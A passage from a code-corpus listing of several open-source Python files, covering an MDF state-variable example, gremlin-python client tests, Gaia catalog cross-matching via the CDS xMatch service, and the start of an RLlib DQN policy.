with self.assertRaises(ValueError):
target.fit(X_normal)
def test_anomaly_analysis_score_shape(self):
target = self._makeOne()
target.fit(self.X_normal)
pred, pmatrix = target.anomaly_analysis_score(self.X_error)
self.assertEqual(pred.shape, (3, ))
self.assertEqual(pmatrix.shape, (3, 3))
if __name__ == '__main__':
unittest.main()
| 2.453125 | 2 |
examples/MDF/states.py | 29riyasaxena/MDF | 12 | 1241 | """
Example of ModECI MDF - Testing state variables
"""
from modeci_mdf.mdf import *
import sys
def main():
mod = Model(id="States")
mod_graph = Graph(id="state_example")
mod.graphs.append(mod_graph)
## Counter node
counter_node = Node(id="counter_node")
p1 = Parameter(id="increment", value=1)
counter_node.parameters.append(p1)
p2 = Parameter(id="count", value="count + increment")
counter_node.parameters.append(p2)
op1 = OutputPort(id="out_port", value=p2.id)
counter_node.output_ports.append(op1)
mod_graph.nodes.append(counter_node)
## Sine node...
sine_node = Node(id="sine_node")
sine_node.parameters.append(Parameter(id="amp", value=3))
sine_node.parameters.append(Parameter(id="period", value=0.4))
s1 = Parameter(
id="level", default_initial_value=0, time_derivative="6.283185 * rate / period"
)
sine_node.parameters.append(s1)
s2 = Parameter(
id="rate",
default_initial_value=1,
time_derivative="-1 * 6.283185 * level / period",
)
sine_node.parameters.append(s2)
op1 = OutputPort(id="out_port", value="amp * level")
sine_node.output_ports.append(op1)
mod_graph.nodes.append(sine_node)
new_file = mod.to_json_file("%s.json" % mod.id)
new_file = mod.to_yaml_file("%s.yaml" % mod.id)
if "-run" in sys.argv:
verbose = True
# verbose = False
from modeci_mdf.utils import load_mdf, print_summary
from modeci_mdf.execution_engine import EvaluableGraph
eg = EvaluableGraph(mod_graph, verbose)
dt = 0.01
duration = 2
t = 0
recorded = {}
times = []
s = []
while t <= duration:
times.append(t)
print("====== Evaluating at t = %s ======" % (t))
if t == 0:
eg.evaluate() # replace with initialize?
else:
eg.evaluate(time_increment=dt)
s.append(eg.enodes["sine_node"].evaluable_outputs["out_port"].curr_value)
t += dt
if "-nogui" not in sys.argv:
import matplotlib.pyplot as plt
plt.plot(times, s)
plt.show()
if "-graph" in sys.argv:
mod.to_graph_image(
engine="dot",
output_format="png",
view_on_render=False,
level=3,
filename_root="states",
only_warn_on_fail=True, # Makes sure test of this doesn't fail on Windows on GitHub Actions
)
return mod_graph
if __name__ == "__main__":
main()
| 2.359375 | 2 |
gremlin-python/src/main/jython/tests/driver/test_client.py | jseekamp/tinkerpop | 1 | 1242 | <filename>gremlin-python/src/main/jython/tests/driver/test_client.py
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
'''
import pytest
from gremlin_python.driver.protocol import GremlinServerError
from gremlin_python.driver.client import Client
from gremlin_python.driver.protocol import GremlinServerError
from gremlin_python.driver.request import RequestMessage
from gremlin_python.process.strategies import OptionsStrategy
from gremlin_python.process.graph_traversal import __
from gremlin_python.structure.graph import Graph
__author__ = '<NAME> (<EMAIL>)'
def test_connection(connection):
g = Graph().traversal()
t = g.V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
results_set = connection.write(message).result()
future = results_set.all()
results = future.result()
assert len(results) == 6
assert isinstance(results, list)
assert results_set.done.done()
assert 'host' in results_set.status_attributes
def test_client_simple_eval(client):
assert client.submit('1 + 1').all().result()[0] == 2
def test_client_simple_eval_bindings(client):
assert client.submit('x + x', {'x': 2}).all().result()[0] == 4
def test_client_eval_traversal(client):
assert len(client.submit('g.V()').all().result()) == 6
def test_client_error(client):
try:
# should fire an exception
client.submit('1/0').all().result()
assert False
except GremlinServerError as ex:
assert 'exceptions' in ex.status_attributes
assert 'stackTrace' in ex.status_attributes
def test_client_connection_pool_after_error(client):
# Overwrite fixture with pool_size=1 client
client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1)
try:
# should fire an exception
client.submit('1/0').all().result()
assert False
except GremlinServerError as gse:
# expecting the pool size to be 1 again after query returned
assert gse.status_code == 597
assert client.available_pool_size == 1
def test_client_bytecode(client):
g = Graph().traversal()
t = g.V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
result_set = client.submit(message)
assert len(result_set.all().result()) == 6
def test_client_bytecode_options(client):
# smoke test to validate serialization of OptionsStrategy. no way to really validate this from an integration
# test perspective because there's no way to access the internals of the strategy via bytecode
g = Graph().traversal()
t = g.withStrategies(OptionsStrategy(options={"x": "test", "y": True})).V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
result_set = client.submit(message)
assert len(result_set.all().result()) == 6
##
t = g.with_("x", "test").with_("y", True).V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
result_set = client.submit(message)
assert len(result_set.all().result()) == 6
def test_iterate_result_set(client):
g = Graph().traversal()
t = g.V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
result_set = client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 6
def test_client_async(client):
g = Graph().traversal()
t = g.V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
future = client.submitAsync(message)
result_set = future.result()
assert len(result_set.all().result()) == 6
def test_connection_share(client):
# Overwrite fixture with pool_size=1 client
client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1)
g = Graph().traversal()
t = g.V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
future = client.submitAsync(message)
future2 = client.submitAsync(message2)
result_set2 = future2.result()
assert len(result_set2.all().result()) == 6
# This future has to finish for the second to yield result - pool_size=1
assert future.done()
result_set = future.result()
assert len(result_set.all().result()) == 6
def test_multi_conn_pool(client):
g = Graph().traversal()
t = g.V()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})
client = Client('ws://localhost:45940/gremlin', 'g', pool_size=1)
future = client.submitAsync(message)
future2 = client.submitAsync(message2)
result_set2 = future2.result()
assert len(result_set2.all().result()) == 6
# with connection pool `future` may or may not be done here
result_set = future.result()
assert len(result_set.all().result()) == 6
def test_big_result_set(client):
g = Graph().traversal()
t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 1
t = g.V().limit(10)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 10
t = g.V().limit(100)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 100
t = g.V().limit(1000)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 1000
t = g.V().limit(10000)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 10000
def test_big_result_set_secure(secure_client):
g = Graph().traversal()
t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count()
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = secure_client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 1
t = g.V().limit(10)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = secure_client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 10
t = g.V().limit(100)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = secure_client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 100
t = g.V().limit(1000)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = secure_client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 1000
t = g.V().limit(10000)
message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})
result_set = secure_client.submit(message)
results = []
for result in result_set:
results += result
assert len(results) == 10000
| 2.015625 | 2 |
gaia_tools/xmatch/__init__.py | henrysky/gaia_tools | 44 | 1243 | <reponame>henrysky/gaia_tools
# Tools for cross-matching catalogs
import csv
import sys
import os
import os.path
import platform
import shutil
import subprocess
import tempfile
import warnings
WIN32= platform.system() == 'Windows'
import numpy
import astropy.coordinates as acoords
from astropy.table import Table
from astropy import units as u
from ..load.download import _ERASESTR
def xmatch(cat1,cat2,maxdist=2,
colRA1='RA',colDec1='DEC',epoch1=None,
colRA2='RA',colDec2='DEC',epoch2=None,
colpmRA2='pmra',colpmDec2='pmdec',
swap=False,
col_field=None):
"""
NAME:
xmatch
PURPOSE:
cross-match two catalogs (incl. proper motion in cat2 if epochs are different)
INPUT:
cat1 - First catalog
cat2 - Second catalog
maxdist= (2) maximum distance in arcsec
colRA1= ('RA') name of the tag in cat1 with the right ascension in degree in cat1 (assumed to be ICRS)
colDec1= ('DEC') name of the tag in cat1 with the declination in degree in cat1 (assumed to be ICRS)
epoch1= (2000.) epoch of the coordinates in cat1
colRA2= ('RA') name of the tag in cat2 with the right ascension in degree in cat2 (assumed to be ICRS)
colDec2= ('DEC') name of the tag in cat2 with the declination in degree in cat2 (assumed to be ICRS)
epoch2= (2000.) epoch of the coordinates in cat2
colpmRA2= ('pmra') name of the tag in cat2 with the proper motion in right ascension in degree in cat2 (assumed to be ICRS; includes cos(Dec)) [only used when epochs are different]
colpmDec2= ('pmdec') name of the tag in cat2 with the proper motion in declination in degree in cat2 (assumed to be ICRS) [only used when epochs are different]
swap= (False) if False, find closest matches in cat2 for each cat1 source, if False do the opposite (important when one of the catalogs has duplicates)
col_field= (None) if None, simply cross-match on RA and Dec; if a string, then cross-match on RA and Dec with additional matching in the data tag specified by the string
OUTPUT:
(index into cat1 of matching objects,
index into cat2 of matching objects,
angular separation between matching objects)
HISTORY:
2016-09-12 - Written - Bovy (UofT)
2016-09-21 - Account for Gaia epoch 2015 - Bovy (UofT)
2019-07-07 - add additional catalog field matching - Leung (UofT)
"""
if epoch1 is None:
if 'ref_epoch' in cat1.dtype.fields:
epoch1= cat1['ref_epoch']
else:
epoch1= 2000.
if epoch2 is None:
if 'ref_epoch' in cat2.dtype.fields:
epoch2= cat2['ref_epoch']
else:
epoch2= 2000.
_check_epoch(cat1,epoch1)
_check_epoch(cat2,epoch2)
depoch= epoch2-epoch1
if numpy.any(depoch != 0.):
# Use proper motion to get both catalogs at the same time
dra=cat2[colpmRA2]/numpy.cos(cat2[colDec2]/180.*numpy.pi)\
/3600000.*depoch
ddec= cat2[colpmDec2]/3600000.*depoch
# Don't shift objects with non-existing proper motion
dra[numpy.isnan(cat2[colpmRA2])]= 0.
ddec[numpy.isnan(cat2[colpmDec2])]= 0.
else:
dra= 0.
ddec= 0.
mc1= acoords.SkyCoord(cat1[colRA1],cat1[colDec1],
unit=(u.degree, u.degree),frame='icrs')
mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec,
unit=(u.degree, u.degree),frame='icrs')
if col_field is not None:
try: # check if the field actually exists in both cat1/cat2
cat1[col_field]
cat2[col_field]
except KeyError: # python 2/3 format string
raise KeyError("'%s' does not exist in both catalog" % col_field)
uniques = numpy.unique(cat1[col_field])
if swap: # times neg one to indicate those indices untouch will be noticed at the end and filtered out
d2d = numpy.ones(len(cat2)) * -1.
idx = numpy.zeros(len(cat2), dtype=int)
else:
d2d = numpy.ones(len(cat1)) * -1.
idx = numpy.zeros(len(cat1), dtype=int)
for unique in uniques: # loop over the class
idx_1 = numpy.arange(cat1[colRA1].shape[0])[cat1[col_field] == unique]
idx_2 = numpy.arange(cat2[colRA2].shape[0])[cat2[col_field] == unique]
if idx_1.shape[0] == 0 or idx_2.shape[0] == 0: # the case where a class only exists in one but not the other
continue
if swap:
temp_idx, temp_d2d, d3d = mc2[idx_2].match_to_catalog_sky(mc1[idx_1])
m1 = numpy.arange(len(cat2))
idx[cat2[col_field] == unique] = idx_1[temp_idx]
d2d[cat2[col_field] == unique] = temp_d2d
else:
temp_idx, temp_d2d, d3d = mc1[idx_1].match_to_catalog_sky(mc2[idx_2])
m1 = numpy.arange(len(cat1))
idx[cat1[col_field] == unique] = idx_2[temp_idx]
d2d[cat1[col_field] == unique] = temp_d2d
d2d = d2d * temp_d2d.unit # make sure finally we have an unit on d2d array s.t. "<" operation can complete
else:
if swap:
idx,d2d,d3d = mc2.match_to_catalog_sky(mc1)
m1= numpy.arange(len(cat2))
else:
idx,d2d,d3d = mc1.match_to_catalog_sky(mc2)
m1= numpy.arange(len(cat1))
# to make sure filtering out all neg ones which are untouched
mindx= ((d2d < maxdist*u.arcsec) & (0.*u.arcsec <= d2d))
m1= m1[mindx]
m2= idx[mindx]
if swap:
return (m2,m1,d2d[mindx])
else:
return (m1,m2,d2d[mindx])
def cds(cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,colRA='RA',colDec='DEC',
selection='best',epoch=None,colpmRA='pmra',colpmDec='pmdec',
savefilename=None,gaia_all_columns=False):
"""
NAME:
cds
PURPOSE:
Cross-match against a catalog in the CDS archive using the CDS cross-matching service (http://cdsxmatch.u-strasbg.fr/xmatch); uses the curl interface
INPUT:
cat - a catalog to cross match, requires 'RA' and 'DEC' keywords (see below)
xcat= ('vizier:I/350/gaiaedr3') name of the catalog to cross-match against, in a format understood by the CDS cross-matching service (see http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html; things like 'vizier:Tycho2' or 'vizier:I/345/gaia2')
maxdist= (2) maximum distance in arcsec
colRA= ('RA') name of the tag in cat with the right ascension
colDec= ('DEC') name of the tag in cat with the declination
selection= ('best') select either all matches or the best match according to CDS (see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html)
epoch= (2000.) epoch of the coordinates in cat
colpmRA= ('pmra') name of the tag in cat with the proper motion in right ascension in degree in cat (assumed to be ICRS; includes cos(Dec)) [only used when epoch != 2000.]
colpmDec= ('pmdec') name of the tag in cat with the proper motion in declination in degree in cat (assumed to be ICRS) [only used when epoch != 2000.]
gaia_all_columns= (False) set to True if you are matching against Gaia DR2 and want *all* columns returned; this runs a query at the Gaia Archive, which may or may not work...
savefilename= (None) if set, save the output from CDS to this path; can match back using cds_matchback
OUTPUT:
(xcat entries for those that match,
indices into cat of matching sources: index[0] is cat index of xcat[0])
HISTORY:
2016-09-12 - Written based on RC catalog code - Bovy (UofT)
2016-09-21 - Account for Gaia epoch 2015 - Bovy (UofT)
2018-05-08 - Added gaia_all_columns - Bovy (UofT)
"""
if epoch is None:
if 'ref_epoch' in cat.dtype.fields:
epoch= cat['ref_epoch']
else:
epoch= 2000.
_check_epoch(cat,epoch)
depoch= epoch-2000.
if numpy.any(depoch != 0.):
# Use proper motion to get both catalogs at the same time
dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\
/3600000.*depoch
ddec= cat[colpmDec]/3600000.*depoch
# Don't shift objects with non-existing proper motion
dra[numpy.isnan(cat[colpmRA])]= 0.
ddec[numpy.isnan(cat[colpmDec])]= 0.
else:
dra= numpy.zeros(len(cat))
ddec= numpy.zeros(len(cat))
if selection != 'all': selection= 'best'
if selection == 'all':
raise NotImplementedError("selection='all' CDS cross-match not currently implemented")
# Write positions
posfilename= tempfile.mktemp('.csv',dir=os.getcwd())
resultfilename= tempfile.mktemp('.csv',dir=os.getcwd())
with open(posfilename,'w') as csvfile:
wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL)
wr.writerow(['RA','DEC'])
for ii in range(len(cat)):
wr.writerow([(cat[ii][colRA]-dra[ii]+360.) % 360.,
cat[ii][colDec]]-ddec[ii])
_cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat)
# Directly match on input RA
ma= cds_load(resultfilename)
if gaia_all_columns:
from astroquery.gaia import Gaia
# Write another temporary file with the XML output of the cross-match
tab= Table(numpy.array([ma['source_id'],ma['RA'],ma['DEC']]).T,
names=('source_id','RA','DEC'),
dtype=('int64','float64','float64'))
xmlfilename= tempfile.mktemp('.xml',dir=os.getcwd())
tab.write(xmlfilename,format='votable')
#get the data release....
table_identifier = xcat.split('/')[-1]
if table_identifier == 'gaia2':
table_identifier = 'gaiadr2'
try:
job= Gaia.launch_job_async(
"""select g.*, m.RA as mRA, m.DEC as mDEC
from %s.gaia_source as g
inner join tap_upload.my_table as m on m.source_id = g.source_id""" % table_identifier,
upload_resource=xmlfilename,
upload_table_name="my_table")
ma= job.get_results()
except:
print("gaia_tools.xmath.cds failed to retrieve all gaia columns, returning just the default returned by the CDS xMatch instead...")
else:
ma.rename_column('mra','RA')
ma.rename_column('mdec','DEC')
finally:
os.remove(xmlfilename)
# Remove temporary files
os.remove(posfilename)
if savefilename is None:
os.remove(resultfilename)
else:
shutil.move(resultfilename,savefilename)
# Match back to the original catalog
mai= cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch,
colpmRA=colpmRA,colpmDec=colpmDec)
return (ma,mai)
def _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat,
nruns_necessary=1):
"""CDS xMatch (sometimes?) fails for large matches, because of a time-out,
so we recursively split until the batches are small enough to not fail"""
# Figure out which of the hierarchy we are running
try:
runs= ''.join([str(int(r)-1)
for r in posfilename.split('csv.')[-1].split('.')])
except ValueError:
runs= ''
nruns= 2**len(runs)
if nruns >= nruns_necessary:
# Only run this level's match if we don't already know that we should
# be using smaller batches
_cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat)
try:
ma= cds_load(resultfilename)
except ValueError: # Assume this is the time-out failure
pass
else:
return nruns
# xMatch failed because of time-out, split
posfilename1= posfilename+'.1'
posfilename2= posfilename+'.2'
resultfilename1= resultfilename+'.1'
resultfilename2= resultfilename+'.2'
# Figure out which of the hierarchy we are running
runs= ''.join([str(int(r)-1)
for r in posfilename1.split('csv.')[-1].split('.')])
nruns= 2**len(runs)
thisrun1= 1+int(runs,2)
thisrun2= 1+int(''.join([str(int(r)-1)
for r in posfilename2.split('csv.')[-1].split('.')]),2)
# Count the number of objects
with open(posfilename,'r') as posfile:
num_lines= sum(1 for line in posfile)
# Write the header line
with open(posfilename1,'w') as posfile1:
with open(posfilename,'r') as posfile:
posfile1.write(posfile.readline())
with open(posfilename2,'w') as posfile2:
with open(posfilename,'r') as posfile:
posfile2.write(posfile.readline())
# Cut in half
cnt= 0
with open(posfilename,'r') as posfile:
with open(posfilename1,'a') as posfile1:
with open(posfilename2,'a') as posfile2:
for line in posfile:
if cnt == 0:
cnt+= 1
continue
if cnt < num_lines//2:
posfile1.write(line)
cnt+= 1 # Can stop counting once this if is done
else:
posfile2.write(line)
# Run each
sys.stdout.write('\r'+"Working on CDS xMatch batch {} / {} ...\r"\
.format(thisrun1,nruns))
sys.stdout.flush()
nruns_necessary= _cds_match_batched(resultfilename1,posfilename1,
maxdist,selection,xcat,
nruns_necessary=nruns_necessary)
sys.stdout.write('\r'+"Working on CDS xMatch batch {} / {} ...\r"\
.format(thisrun2,nruns))
sys.stdout.flush()
nruns_necessary= _cds_match_batched(resultfilename2,posfilename2,
maxdist,selection,xcat,
nruns_necessary=nruns_necessary)
sys.stdout.write('\r'+_ERASESTR+'\r')
sys.stdout.flush()
# Combine results
with open(resultfilename,'w') as resultfile:
with open(resultfilename1,'r') as resultfile1:
for line in resultfile1:
resultfile.write(line)
with open(resultfilename2,'r') as resultfile2:
for line in resultfile2:
if line[0] == 'a': continue
resultfile.write(line)
# Remove intermediate files
os.remove(posfilename1)
os.remove(posfilename2)
os.remove(resultfilename1)
os.remove(resultfilename2)
return nruns_necessary
def _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat):
# Send to CDS for matching
result= open(resultfilename,'w')
try:
subprocess.check_call(['curl',
'-X','POST',
'-F','request=xmatch',
'-F','distMaxArcsec=%i' % maxdist,
'-F','selection=%s' % selection,
'-F','RESPONSEFORMAT=csv',
'-F','cat1=@%s' % os.path.basename(posfilename),
'-F','colRA1=RA',
'-F','colDec1=DEC',
'-F','cat2=%s' % xcat,
'http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync'],
stdout=result)
except subprocess.CalledProcessError:
os.remove(posfilename)
if os.path.exists(resultfilename):
result.close()
os.remove(resultfilename)
result.close()
return None
def cds_load(filename):
if WIN32:
# windows do not have float128, but source_id is double
# get around this by squeezing precision from int64 on source_id as source_id is always integer anyway
# first read everything as fp64 and then convert source_id to int64 will keep its precision
data = numpy.genfromtxt(filename, delimiter=',', skip_header=0,
filling_values=-9999.99, names=True, max_rows=1,
dtype='float64') # only read the first row max to reduce workload to just get the column name
to_list = list(data.dtype.names)
# construct a list where everything is fp64 except 'source_id' being int64
dtype_list = [('{}'.format(i), numpy.float64) for i in to_list]
dtype_list[dtype_list.index(('source_id', numpy.float64))] = ('source_id', numpy.uint64)
return numpy.genfromtxt(filename, delimiter=',', skip_header=0,
filling_values=-9999.99, names=True,
dtype=dtype_list)
else:
return numpy.genfromtxt(filename, delimiter=',', skip_header=0,
filling_values=-9999.99, names=True,
dtype='float128')
def cds_matchback(cat,xcat,colRA='RA',colDec='DEC',selection='best',
epoch=None,colpmRA='pmra',colpmDec='pmdec',):
"""
NAME:
cds_matchback
PURPOSE:
Match a matched catalog from xmatch.cds back to the original catalog
INPUT
cat - original catalog
xcat - matched catalog returned by xmatch.cds
colRA= ('RA') name of the tag in cat with the right ascension
colDec= ('DEC') name of the tag in cat with the declination
selection= ('best') select either all matches or the best match according to CDS (see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html)
epoch= (2000.) epoch of the coordinates in cat
colpmRA= ('pmra') name of the tag in cat with the proper motion in right ascension in degree in cat (assumed to be ICRS; includes cos(Dec)) [only used when epoch != 2000.]
colpmDec= ('pmdec') name of the tag in cat with the proper motion in declination in degree in cat (assumed to be ICRS) [only used when epoch != 2000.]
OUTPUT:
Array indices into cat of xcat entries: index[0] is cat index of xcat[0]
HISTORY:
2016-09-12 - Written - Bovy (UofT)
2018-05-04 - Account for non-zero epoch difference - Bovy (UofT)
"""
if selection != 'all': selection= 'best'
if selection == 'all':
raise NotImplementedError("selection='all' CDS cross-match not currently implemented")
if epoch is None:
if 'ref_epoch' in cat.dtype.fields:
epoch= cat['ref_epoch']
else:
epoch= 2000.
_check_epoch(cat,epoch)
depoch= epoch-2000.
if numpy.any(depoch != 0.):
# Use proper motion to get both catalogs at the same time
dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\
/3600000.*depoch
ddec= cat[colpmDec]/3600000.*depoch
# Don't shift objects with non-existing proper motion
dra[numpy.isnan(cat[colpmRA])]= 0.
ddec[numpy.isnan(cat[colpmDec])]= 0.
else:
dra= numpy.zeros(len(cat))
ddec= numpy.zeros(len(cat))
# xmatch to v. small diff., because match is against *original* coords,
# not matched coords in CDS
mc1= acoords.SkyCoord(cat[colRA]-dra,cat[colDec]-ddec,
unit=(u.degree, u.degree),frame='icrs')
mc2= acoords.SkyCoord(xcat['RA'],xcat['DEC'],
unit=(u.degree, u.degree),frame='icrs')
idx,d2d,d3d = mc2.match_to_catalog_sky(mc1)
mindx= d2d < 1e-5*u.arcsec
return idx[mindx]
def _check_epoch(cat,epoch):
warn_about_epoch= False
if 'ref_epoch' in cat.dtype.fields:
if 'designation' not in cat.dtype.fields: # Assume this is DR1
if numpy.any(numpy.fabs(epoch-2015.) > 0.01):
warn_about_epoch= True
elif 'Gaia DR2' in cat['designation'][0].decode('utf-8'):
if numpy.any(numpy.fabs(epoch-2015.5) > 0.01):
warn_about_epoch= True
if warn_about_epoch:
warnings.warn("You appear to be using a Gaia catalog, but are not setting the epoch to 2015. (DR1) or 2015.5 (DR2), which may lead to incorrect matches")
return None
| 2.265625 | 2 |
rllib/agents/dqn/dqn_torch_policy.py | ThomasLecat/ray | 0 | 1244 | <reponame>ThomasLecat/ray
from typing import Dict, List, Tuple
import gym
import ray
from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping
from ray.rllib.agents.dqn.dqn_tf_policy import (
PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio)
from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel
from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin
from ray.rllib.models.catalog import ModelCatalog
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.torch.torch_action_dist import (TorchCategorical,
TorchDistributionWrapper)
from ray.rllib.policy.policy import Policy
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.policy.torch_policy import LearningRateSchedule
from ray.rllib.policy.torch_policy_template import build_torch_policy
from ray.rllib.utils.error import UnsupportedSpaceException
from ray.rllib.utils.exploration.parameter_noise import ParameterNoise
from ray.rllib.utils.framework import try_import_torch
from ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss,
reduce_mean_ignore_inf,
softmax_cross_entropy_with_logits)
from ray.rllib.utils.typing import TensorType, TrainerConfigDict
torch, nn = try_import_torch()
F = None
if nn:
F = nn.functional
class QLoss:
def __init__(self,
q_t_selected,
q_logits_t_selected,
q_tp1_best,
q_probs_tp1_best,
importance_weights,
rewards,
done_mask,
gamma=0.99,
n_step=1,
num_atoms=1,
v_min=-10.0,
v_max=10.0):
if num_atoms > 1:
# Distributional Q-learning which corresponds to an entropy loss
z = torch.range(0.0, num_atoms - 1, dtype=torch.float32)
z = v_min + z * (v_max - v_min) / float(num_atoms - 1)
# (batch_size, 1) * (1, num_atoms) = (batch_size, num_atoms)
r_tau = torch.unsqueeze(
rewards, -1) + gamma**n_step * torch.unsqueeze(
1.0 - done_mask, -1) * torch.unsqueeze(z, 0)
r_tau = torch.clamp(r_tau, v_min, v_max)
b = (r_tau - v_min) / ((v_max - v_min) / float(num_atoms - 1))
lb = torch.floor(b)
ub = torch.ceil(b)
# Indispensable judgement which is missed in most implementations
# when b happens to be an integer, lb == ub, so pr_j(s', a*) will
# be discarded because (ub-b) == (b-lb) == 0.
floor_equal_ceil = (ub - lb < 0.5).float()
# (batch_size, num_atoms, num_atoms)
l_project = F.one_hot(lb.long(), num_atoms)
# (batch_size, num_atoms, num_atoms)
u_project = F.one_hot(ub.long(), num_atoms)
ml_delta = q_probs_tp1_best * (ub - b + floor_equal_ceil)
mu_delta = q_probs_tp1_best * (b - lb)
ml_delta = torch.sum(
l_project * torch.unsqueeze(ml_delta, -1), dim=1)
mu_delta = torch.sum(
u_project * torch.unsqueeze(mu_delta, -1), dim=1)
m = ml_delta + mu_delta
# Rainbow paper claims that using this cross entropy loss for
# priority is robust and insensitive to `prioritized_replay_alpha`
self.td_error = softmax_cross_entropy_with_logits(
logits=q_logits_t_selected, labels=m)
self.loss = torch.mean(self.td_error * importance_weights)
self.stats = {
# TODO: better Q stats for dist dqn
"mean_td_error": torch.mean(self.td_error),
}
else:
q_tp1_best_masked = (1.0 - done_mask) * q_tp1_best
# compute RHS of bellman equation
q_t_selected_target = rewards + gamma**n_step * q_tp1_best_masked
# compute the error (potentially clipped)
self.td_error = q_t_selected - q_t_selected_target.detach()
self.loss = torch.mean(
importance_weights.float() * huber_loss(self.td_error))
self.stats = {
"mean_q": torch.mean(q_t_selected),
"min_q": torch.min(q_t_selected),
"max_q": torch.max(q_t_selected),
"mean_td_error": torch.mean(self.td_error),
}
class ComputeTDErrorMixin:
def __init__(self):
def compute_td_error(obs_t, act_t, rew_t, obs_tp1, done_mask,
importance_weights):
input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t})
input_dict[SampleBatch.ACTIONS] = act_t
input_dict[SampleBatch.REWARDS] = rew_t
input_dict[SampleBatch.NEXT_OBS] = obs_tp1
input_dict[SampleBatch.DONES] = done_mask
input_dict[PRIO_WEIGHTS] = importance_weights
# Do forward pass on loss to update td error attribute
build_q_losses(self, self.model, None, input_dict)
return self.q_loss.td_error
self.compute_td_error = compute_td_error
def build_q_model_and_distribution(
policy: Policy, obs_space: gym.Space, action_space: gym.Space,
config: TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]:
if not isinstance(action_space, gym.spaces.Discrete):
raise UnsupportedSpaceException(
"Action space {} is not supported for DQN.".format(action_space))
if config["hiddens"]:
# try to infer the last layer size, otherwise fall back to 256
num_outputs = ([256] + config["model"]["fcnet_hiddens"])[-1]
config["model"]["no_final_linear"] = True
else:
num_outputs = action_space.n
# TODO(sven): Move option to add LayerNorm after each Dense
# generically into ModelCatalog.
add_layer_norm = (
isinstance(getattr(policy, "exploration", None), ParameterNoise)
